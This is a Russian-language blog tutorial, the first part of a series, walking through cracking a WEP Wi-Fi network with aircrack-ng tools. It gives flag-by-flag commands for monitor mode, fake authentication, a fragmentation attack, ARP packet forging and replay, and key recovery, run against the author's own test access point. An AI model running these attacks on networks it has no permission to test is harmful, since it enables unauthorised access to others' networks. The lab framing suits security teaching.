Взлом Wi-Fi сети (WEP) – часть 1

Начинается цикл статей по анализу и взлому wi-fi сетей. Постараюсь по возможности рассказывать, как можно подробно. Останавливаясь на интересных моментах.

Итак, начну с самого начала, чтобы некоторые вопросы отпали сами собой.

Перевести интерфейс в monitor mode

Для того, чтобы просканировать доступные wi-fi сети, нужно сначала перевести интерфейс wi-fi клиента в режим монитора (monitor mode). Для начала посмотрим, какие беспроводные интерфейсы имеются.

# airmon-ng

У меня доступны два интерфейса: wlan0 и wlan1. wlan0 это обычный и ничем не примечательный wi-fi клиент, который в данной ситуации не нужен. wlan1 – специализированный беспроводной клиент (ALFA AWUS036H), который как раз нужно перевести в режим монитора. Делается это следующим способом:

# airmon-ng start wlan1

Как видно из листинга, wlan1 создает виртуальный интерфейс mon0, который находится в режиме монитора (monitor mode).

Теперь можем сканировать wi-fi сети. Опять напомню, что выдаются только те AP, в зоне действия которых находимся.

Для справки: можно конечно увеличить область приема. Для этого необходимо приобрести узконаправленную антенну с большим коэффициентом усиления, например от 15 до 20 dbi. В wi-fi клиенте, который использую я, коэффициент усиления антенны составляет 5 dbi. В стандартных wi-fi клиентах и точках доступа (AP) используется ненаправленные антенны (с круговой диаграммой направленности) и коэффициентом усиления от 2 до 3 dbi.

# airodump-ng mon0

Из листинга видим, какие точки доступа находятся в радиусе действия. Но так как закон нарушать очень не хорошо, я буду проводить взлом wi-fi на своей тестовой точке доступа (SSID: hub-lex-AP, канал: 1, MAC-адрес: BC:AE:C5:71:D3:17).

Настройка интерфейса завершена. Теперь займемся непосредственно взломом wi-fi.

Fragmentation attack

Итак, осталось только настроить интерфейс mon0 на конкретную точку доступа (AP). Если этого не сделать, mon0 будет и дальше мониторить все каналы. Следующая команда переводит интерфейс на тестовую wi-fi сеть hub-lex-AP.

# airodump-ng -c 1 -w wep --bssid BC:AE:C5:71:D3:17 mon0
  • -c – номер канала
  • -w – название дамп-файла
  • –bssid – MAC-адрес точки доступа

Первое, что необходимо, это подключиться к точке доступа. Следующая команда (Fake authentication) позволяет это сделать.

# aireplay-ng -1 0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0
  • -1 – фиктивная аутентификация
  •  0 – реассоциация времени (сек.)
  • -a – MAC-адрес точки доступа
  • -h – MAC-адрес клиента, который используем

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

Далее будем использовать Fragmentation attack. Fragmentation attack позволяет получить ключевой поток длины 1500 байт, что позволит затем отсылать произвольные пакеты в сеть.

# aireplay-ng -5 -b BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0
  • -5 – fragmentation attack
  • -b – MAC-адрес точки доступа
  • -h – MAC-адрес клиента

Теперь воспользуемся packetforge-ng, чтобы создать шифрованный пакет.

# packetforge-ng -0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A -k 255.255.255.255 -l 255.255.255.255 -y fragment-1210-103644.xor -w arp
  • -0 – генерировать ARP-пакет
  • -a – MAC-адрес точки доступа
  • -h – MAC-адрес клиента
  • -k – IP получателя
  • -l – IP отправителя
  • -y – чтение PRGA из файла
  • -w – записать пакет в pcap-файл

Далее используем Interactive packet replay (интерактивная генерация пакетов).

# aireplay-ng -2 -r arp mon0
  • -2 – interactive replay attack
  • -r – имя pcap-файла

Осталось подождать пока соберется достаточное количество Data-пакетов.

Data-пакеты собраны. Требуется расшифровать их.

 

# aircrack-ng -a 1 -0 wep-01.cap
  • -a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
  •  1 – WEP
  • -0 – использовать цвет

Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

Специалист в области кибер-безопасности. Работал в ведущих компаниях занимающихся защитой и аналитикой компьютерных угроз. Цель данного блога - простым языком рассказать о сложных моментах защиты IT инфраструктур и сетей.

7 comments On Взлом Wi-Fi сети (WEP) – часть 1

Leave a reply:

Your email address will not be published.